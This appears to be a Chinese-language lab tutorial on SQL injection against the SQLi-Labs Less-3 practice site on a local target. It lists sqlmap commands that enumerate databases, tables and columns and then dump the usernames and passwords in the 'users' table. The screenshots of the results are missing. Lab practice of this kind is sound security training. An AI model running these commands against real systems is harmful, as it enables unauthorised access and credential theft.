实验环境
操作系统:Windows10
安装的应用软件:Sqlmap、FireFox浏览器插件HackBar;Apache、MySQL、PHP;DVWA、SQLi-Labs漏洞网站环境
实验步骤
1.访问SQLi-Labs网站Less-3
http://靶机ip/sql/Less-3
登录后,根据网页提示,先给定一个GET参数:
/http://靶机ip/sql/Less-3/?id=1
2.启动SQLmap
找到SQLmap所在目录输入cmd进入命令行,输入命令启动SQLmap:
python sqlmap.py -h
?3.寻找注入点
输入命令自动寻找网站注入点,并获取网站及后台数据库的基本信息:
python sqlmap.py -u http://靶机ip/sql/Less-3/?id=1
检测结果:
?4.获取所有数据库的库名
(1)python sqlmap.py -u http://靶机ip/sql/Less-3/?id=1 --dbs
?检测结果如下:
?(2)使用以下命令获取网站当前所在数据库的库名
python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 --current-db
检测结果如下图:
5.获取数据库中所有的表名
python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 -D security --tables
检测结果如下图:
?6.获取users表中的全部字段名
sqlmap>python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 -D security -T users --columns
?检测结果如下图:
?7.获取users表id、username、password字段的全部值
python sqlmap.py -u http://192.168.56.1/sql/Less-3/?id=1 -D security -T users -C id,username,password --dump
检测结果如下图:
?